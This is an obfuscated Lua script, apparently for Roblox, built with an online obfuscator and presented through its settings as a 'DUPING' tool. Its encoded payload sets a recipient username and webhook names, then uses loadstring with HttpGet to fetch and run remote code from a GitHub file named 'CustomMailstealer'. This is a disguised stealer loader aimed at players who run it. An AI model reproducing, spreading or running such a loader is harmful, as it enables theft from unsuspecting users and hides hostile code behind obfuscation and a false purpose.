--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-1)))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-(620 -((1432 -(282 + 595)) + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * 65536) + (v38 * ((366 + 7) -(32 + 19 + 66))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,2 -1 ,36 -(28 -12) ) * ((3 -(1 + 0))^(382 -(87 + 263)))) + v41 ;local v45=v20(v42,201 -(67 + 113) ,23 + 8 );local v46=((v20(v42,78 -46 )==(1 + (0 -0))) and  -(3 -2)) or 1 ;if (v45==(952 -(802 + 150))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else v45=1;v43=0 + 0 ;end elseif (v45==(3044 -(915 + (178 -96)))) then return ((v44==0) and (v46 * ((2 -(1 + 0))/0))) or (v46 * NaN) ;end return v8(v46,v45-((1387 -(368 + 423)) + (1341 -914)) ) * (v43 + (v44/((2 -0)^(1239 -(1069 + 118))))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(18 -(10 + 8))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v65=443 -(416 + 26) , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 + 0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if ((1 + 1)==v50) then v55=nil;v56=nil;v50=5 -2 ;end if (3~=v50) then else v57=nil;v58=nil;v50=2 + 2 ;end if (v50~=4) then else while true do if (v51~=(1 + 0)) then else local v95=1227 -(322 + 905) ;local v96;while true do if (v95==(611 -(602 + 9))) then v96=1189 -(449 + 740) ;while true do if (v96==0) then local v111=529 -(406 + 123) ;while true do if ((1769 -(1749 + 20))==v111) then v54=nil;v55=nil;v111=1 + 0 ;end if (v111==(1323 -(1249 + 73))) then v96=1 + 0 ;break;end end end if ((441 -(382 + 58))==v96) then v51=1147 -(466 + 679) ;break;end end break;end end end if (v51==(4 -2)) then local v97=0;while true do if (v97==0) then local v100=0;while true do if (v100~=1) then else v97=3 -2 ;break;end if (v100==(0 -0)) then v56=nil;v57=nil;v100=1;end end end if (1==v97) then v51=1903 -(106 + 1794) ;break;end end end if (v51==(1 + 2)) then v58=nil;while true do local v99=0;while true do if (v99~=(0 -0)) then else local v101=0;while true do if (v101==(1206 -(902 + 303))) then v99=1 -0 ;break;end if (v101==(0 + 0)) then if (v52~=(2 -1)) then else local v147=1690 -(1121 + 569) ;local v148;while true do if (v147==0) then v148=0;while true do if (v148==(215 -(22 + 192))) then v58={};v52=2;break;end if (v148==(0 -0)) then local v160=114 -(4 + 110) ;local v161;while true do if (v160==(584 -(57 + 527))) then v161=1427 -(41 + 1386) ;while true do if (1~=v161) then else v148=104 -(17 + 86) ;break;end if (v161~=(0 + 0)) then else local v177=0;while true do if (v177~=(0 -0)) then else v56={v53,v54,nil,v55};v57=v23();v177=1 -0 ;end if (v177==(3 -2)) then v161=3 -2 ;break;end end end end break;end end end end break;end end end if (v52~=(2 + 0)) then else local v149=0 -0 ;local v150;local v151;while true do if (v149~=(1 + 0)) then else while true do if (v150==(0 -0)) then v151=0;while true do if (v151~=(65 -(30 + 35))) then else for v165=1 + 0 ,v57 do local v166=0 -0 ;local v167;local v168;local v169;while true do if (v166==(0 + 0)) then v167=0 -0 ;v168=nil;v166=1258 -(1043 + 214) ;end if (v166~=(3 -2)) then else v169=nil;while true do if (v167~=(1212 -(323 + 889))) then else v168=v21();v169=nil;v167=1 + 0 ;end if ((2 -1)~=v167) then else if (v168==(581 -(361 + 219))) then v169=v21()~=(320 -(53 + 267)) ;elseif (v168==2) then v169=v24();elseif (v168==(1 + 2)) then v169=v25();end v58[v165]=v169;break;end end break;end end end v56[3]=v21();v151=1;end if (v151==(414 -(15 + 398))) then for v170=983 -(18 + 964) ,v23() do local v171=0 -0 ;local v172;local v173;local v174;while true do if (v171~=(0 + 0)) then else v172=0 + 0 ;v173=nil;v171=851 -(20 + 830) ;end if (v171==(1 -0)) then v174=nil;while true do if (v172==(0 + 0)) then local v179=126 -(116 + 10) ;while true do if (v179==(0 + 0)) then v173=0;v174=nil;v179=1 + 0 ;end if (v179==(739 -(542 + 196))) then v172=1 -0 ;break;end end end if (v172==(1 + 0)) then while true do if (v173==(0 + 0)) then v174=v21();if (v20(v174,1 + 0 ,2 -1 )==(0 + 0)) then local v180=849 -(254 + 595) ;local v181;local v182;local v183;local v184;local v185;local v186;while true do if (v180==(127 -(55 + 71))) then v183=nil;v184=nil;v180=2 -0 ;end if (v180==(0 -0)) then v181=0 -0 ;v182=nil;v180=1552 -(1126 + 425) ;end if (v180~=(408 -(118 + 287))) then else while true do if (v181==(3 -2)) then local v187=0;while true do if (v187==(1122 -(118 + 1003))) then v181=5 -3 ;break;end if (v187==(939 -(714 + 225))) then v184=nil;v185=nil;v187=1;end end end if ((379 -(142 + 235))==v181) then v186=nil;while true do if (v182~=(9 -7)) then else while true do if (v183==(1 + 2)) then if (v20(v185,980 -(553 + 424) ,5 -2 )~=(1 + 0)) then else v186[810 -(118 + 688) ]=v58[v186[52 -(25 + 23) ]];end v53[v170]=v186;break;end if (v183~=(1 + 0)) then else local v194=0 + 0 ;local v195;local v196;while true do if (v194==(1 + 0)) then while true do if ((0 + 0)==v195) then v196=0 -0 ;while true do if (v196==(1 + 0)) then v183=2;break;end if (v196==(732 -(16 + 716))) then local v206=0;while true do if (v206==(1 -0)) then v196=1;break;end if (v206==(0 -0)) then v186={v22(),v22(),nil,nil};if (v184==(285 -(175 + 110))) then local v208=0 -0 ;local v209;local v210;while true do if (v208==(1 + 0)) then while true do if (v209~=(1796 -(503 + 1293))) then else v210=0 -0 ;while true do if (v210==(753 -(239 + 514))) then v186[2 + 1 ]=v22();v186[1065 -(810 + 251) ]=v22();break;end end break;end end break;end if (v208~=0) then else v209=0 + 0 ;v210=nil;v208=1330 -(797 + 532) ;end end elseif (v184==1) then v186[3 + 0 ]=v23();elseif (v184==(1 + 1)) then v186[3]=v23() -(2^16) ;elseif (v184~=(6 -3)) then else local v217=0;while true do if (v217~=(533 -(43 + 490))) then else v186[1205 -(373 + 829) ]=v23() -(2^(61 -45)) ;v186[735 -(476 + 255) ]=v22();break;end end end v206=1;end end end end break;end end break;end if (v194==(859 -(240 + 619))) then v195=0;v196=nil;v194=1131 -(369 + 761) ;end end end if (v183~=2) then else local v197=0;local v198;local v199;while true do if (v197~=(1 + 0)) then else while true do if (v198==0) then v199=0 -0 ;while true do if (v199~=(0 + 0)) then else local v207=0 -0 ;while true do if (v207==(0 -0)) then if (v20(v185,239 -(64 + 174) ,1)~=1) then else v186[407 -(255 + 150) ]=v58[v186[2 + 0 ]];end if (v20(v185,2 + 0 ,8 -6 )==(3 -2)) then v186[1 + 2 ]=v58[v186[1742 -(404 + 1335) ]];end v207=1 -0 ;end if (v207==(1 -0)) then v199=337 -(144 + 192) ;break;end end end if ((217 -(42 + 174))==v199) then v183=3;break;end end break;end end break;end if (v197~=(0 + 0)) then else v198=0 + 0 ;v199=nil;v197=1 + 0 ;end end end if (v183==0) then local v200=337 -(10 + 327) ;local v201;while true do if (v200==(0 + 0)) then v201=0;while true do if (v201~=(1504 -(363 + 1141))) then else v184=v20(v174,2,3);v185=v20(v174,3 + 1 ,344 -(118 + 220) );v201=1581 -(1183 + 397) ;end if (v201==(2 -1)) then v183=1 + 0 ;break;end end break;end end end end break;end if (v182==1) then local v189=0 + 0 ;local v190;while true do if (v189~=(1975 -(1913 + 62))) then else v190=0 + 0 ;while true do if (v190==(0 -0)) then local v204=1933 -(565 + 1368) ;while true do if (v204==0) then v185=nil;v186=nil;v204=1;end if (v204~=1) then else v190=1;break;end end end if (v190==1) then v182=1 + 1 ;break;end end break;end end end if (v182~=0) then else local v191=1819 -(580 + 1239) ;local v192;while true do if ((0 -0)==v191) then v192=0;while true do if (v192==(1662 -(1477 + 184))) then v182=1;break;end if (v192==(0 -0)) then local v205=0;while true do if (v205==0) then v183=0;v184=nil;v205=1 + 0 ;end if (v205~=(1 + 0)) then else v192=1;break;end end end end break;end end end end break;end if (v181~=0) then else local v188=0;while true do if (v188==(1 + 0)) then v181=857 -(564 + 292) ;break;end if (v188==(0 -0)) then v182=0 -0 ;v183=nil;v188=1 + 0 ;end end end end break;end if (v180==(1169 -(645 + 522))) then v185=nil;v186=nil;v180=3;end end end break;end end break;end end break;end end end v52=3;break;end end break;end end break;end if (v149==(1790 -(1010 + 780))) then v150=0;v151=nil;v149=1;end end end v101=2 -1 ;end end end if (v99==(1 + 0)) then if (v52==(0 -0)) then local v112=304 -(244 + 60) ;local v113;local v114;while true do if (v112~=(1837 -(1045 + 791))) then else while true do if (v113~=0) then else v114=0 + 0 ;while true do if (v114~=(476 -(41 + 435))) then else local v162=0 -0 ;while true do if (v162==(1001 -(938 + 63))) then v53={};v54={};v162=1;end if (v162==(1575 -(1281 + 293))) then v114=1 + 0 ;break;end end end if (v114~=1) then else v55={};v52=267 -(28 + 238) ;break;end end break;end end break;end if (0==v112) then v113=1125 -(936 + 189) ;v114=nil;v112=1 + 0 ;end end end if (v52==3) then local v115=1613 -(1565 + 48) ;local v116;while true do if (v115==0) then v116=0 + 0 ;while true do if (v116==(1138 -(782 + 356))) then local v159=267 -(176 + 91) ;while true do if (v159==(0 -0)) then local v163=0 -0 ;while true do if (0~=v163) then else for v175=1,v23() do v54[v175-(1093 -(975 + 117)) ]=v28();end return v56;end end end end end end break;end end end break;end end end break;end if (v51==(1875 -(157 + 1718))) then local v98=0 + 0 ;while true do if (v98~=(0 + 0)) then else v52=470 -(381 + 89) ;v53=nil;v98=3 -2 ;end if (v98~=(3 -2)) then else v51=1;break;end end end end break;end if (v50==(1019 -(697 + 321))) then v53=nil;v54=nil;v50=5 -3 ;end if (v50==(0 -0)) then v51=0 + 0 ;v52=nil;v50=2 -1 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v79[3];elseif (v80==1) then v61[v79[3]]=v77[v79[2]];else local v119=v79[2];local v120,v121=v70(v77[v119](v13(v77,v119 + 1 ,v79[3])));v72=(v121 + v119) -1 ;local v122=0;for v137=v119,v72 do v122=v122 + 1 ;v77[v137]=v120[v122];end end elseif (v80<=3) then v77[v79[2]]();elseif (v80==4) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else for v140=v79[2],v79[3] do v77[v140]=nil;end end elseif (v80<=8) then if (v80<=6) then local v104=v79[2];local v105=v77[v79[3]];v77[v104 + 1 ]=v105;v77[v104]=v105[v79[4]];elseif (v80>7) then local v123;local v124,v125;local v126;local v127;if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v126=v77[v79[3]];v77[v127 + 1 ]=v126;v77[v127]=v126[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v124,v125=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v125 + v127) -1 ;v123=0;for v142=v127,v72 do v123=v123 + 1 ;v77[v142]=v124[v123];end v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];else do return;end end elseif (v80<=9) then local v109=0;local v110;while true do if (v109==0) then v110=v79[2];v77[v110]=v77[v110](v13(v77,v110 + 1 ,v72));break;end end elseif (v80==10) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end else v71=v79[3];end v71=v71 + 1 ;break;end if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0F3O00028O0003083O00557365726E616D65030A3O006D616B2O692O30392O7703073O00576562682O6F6B034O00026O00F03F030F3O00475F4C6F6164696E675363722O656E03063O00445550494E47030D3O00475F576562682O6F6B4E616D6503043O0044555045027O0040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657200213O00124O00014O0005000100013O0026043O00020001000100040B3O0002000100122O000100013O0026040001000C0001000100040B3O000C000100122O000200033O001201000200023O00122O000200053O001201000200043O00122O000100063O002604000100130001000600040B3O0013000100122O000200083O001201000200073O00122O0002000A3O001201000200093O00122O0001000B3O002604000100050001000B00040B3O0005000100120A0002000C3O0012080003000D3O00202O00030003000E00122O0005000F6O000300056O00023O00024O00020001000100044O0020000100040B3O0005000100040B3O0020000100040B3O000200012O00073O00017O00",v9(),...);
